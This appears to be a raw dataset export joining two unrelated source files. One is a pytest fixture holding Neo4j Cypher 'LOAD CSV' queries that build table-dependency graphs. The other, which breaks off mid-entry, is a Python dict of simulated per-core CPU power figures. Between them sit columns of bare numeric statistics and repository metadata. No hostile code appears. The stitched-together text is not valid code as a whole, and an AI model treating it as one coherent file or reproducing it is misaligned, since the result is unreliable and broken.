@pytest.fixture()
def query_rel():
return (
'USING PERIODIC COMMIT 500 LOAD CSV WITH HEADERS FROM "file:///reporting_analytics_dependency.csv" AS csvLine\n'
"MERGE (a:Reporting {table_name: toString(csvLine.table_name), table_dataset: toString(csvLine.table_dataset)})\n"
"MERGE (b:Analytics {table_name: toString(csvLine.dependency_name), table_dataset: toString(csvLine.dependency_dataset)})\n"
"CREATE (a)-[:HAS_TABLE_DEPENDENCY {import_datetime: datetime()}]->(b);\n"
'USING PERIODIC COMMIT 500 LOAD CSV WITH HEADERS FROM "file:///reporting_github_repos_dependency.csv" AS csvLine\n'
"MERGE (a:Reporting {table_name: toString(csvLine.table_name), table_dataset: toString(csvLine.table_dataset)})\n"
"MERGE (b:GitHub_Repos {table_name: toString(csvLine.dependency_name), table_dataset: toString(csvLine.dependency_dataset)})\n"
"CREATE (a)-[:HAS_TABLE_DEPENDENCY {import_datetime: datetime()}]->(b);\n"
'USING PERIODIC COMMIT 500 LOAD CSV WITH HEADERS FROM "file:///analytics_analytics_dependency.csv" AS csvLine\n'
"MERGE (a:Analytics {table_name: toString(csvLine.table_name), table_dataset: toString(csvLine.table_dataset)})\n"
"MERGE (b:Analytics {table_name: toString(csvLine.dependency_name), table_dataset: toString(csvLine.dependency_dataset)})\n"
"CREATE (a)-[:HAS_TABLE_DEPENDENCY {import_datetime: datetime()}]->(b);\n"
'USING PERIODIC COMMIT 500 LOAD CSV WITH HEADERS FROM "file:///analytics_github_repos_dependency.csv" AS csvLine\n'
"MERGE (a:Analytics {table_name: toString(csvLine.table_name), table_dataset: toString(csvLine.table_dataset)})\n"
"MERGE (b:GitHub_Repos {table_name: toString(csvLine.dependency_name), table_dataset: toString(csvLine.dependency_dataset)})\n"
"CREATE (a)-[:HAS_TABLE_DEPENDENCY {import_datetime: datetime()}]->(b);\n"
)
| 57.87931
| 155
| 0.722371
| 432
| 3,357
| 5.398148
| 0.118056
| 0.092624
| 0.120069
| 0.113208
| 0.863208
| 0.837479
| 0.8006
| 0.8006
| 0.792882
| 0.746569
| 0
| 0.007692
| 0.148049
| 3,357
| 57
| 156
| 58.894737
| 0.807692
| 0
| 0
| 0.425532
| 0
| 0.234043
| 0.816801
| 0.359547
| 0
| 0
| 0
| 0
| 0.06383
| 1
| 0.106383
| true
| 0
| 0.191489
| 0.106383
| 0.404255
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
|
0
| 10
|
649660841836c29cf2d40e03e8d5d8298b76ad8f
| 68,595
|
py
|
Python
|
benchmarks/SimResults/micro_pinned_train_combos/cmpD_astarlbmtontoh264ref/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/micro_pinned_train_combos/cmpD_astarlbmtontoh264ref/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/micro_pinned_train_combos/cmpD_astarlbmtontoh264ref/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.284464,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.49259,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.282514,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.05957,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.281181,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.42205,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0103121,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0745691,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.076264,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0745691,
'Execution Unit/Register Files/Runtime Dynamic': 0.0865761,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.180189,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.515645,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.26985,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00213583,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00213583,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00189647,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000753928,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00109554,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00726367,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0191864,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0733145,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.66344,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.189155,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.249009,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.11174,
'Instruction Fetch Unit/Runtime Dynamic': 0.537928,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0324138,
'L2/Runtime Dynamic': 0.00727038,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.4787,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.08573,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0725203,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0725204,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.82255,
'Load Store Unit/Runtime Dynamic': 1.51589,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.178823,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.357646,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0634648,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0639507,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.289955,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0310118,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.558172,
'Memory Management Unit/Runtime Dynamic': 0.0949625,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 21.5086,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0145459,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.151049,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.165595,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 4.5915,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0721611,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.259367,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.330198,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.224776,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.362555,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.183005,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.770336,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.206454,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.84281,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0623814,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0094281,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.097612,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0697266,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.159993,
'Execution Unit/Register Files/Runtime Dynamic': 0.0791547,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.223685,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.564692,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.07893,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00135148,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00135148,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00121825,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000494095,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00100163,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00492284,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0114888,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.06703,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.26368,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.18852,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.227664,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.68912,
'Instruction Fetch Unit/Runtime Dynamic': 0.499625,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0169626,
'L2/Runtime Dynamic': 0.00392565,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.66904,
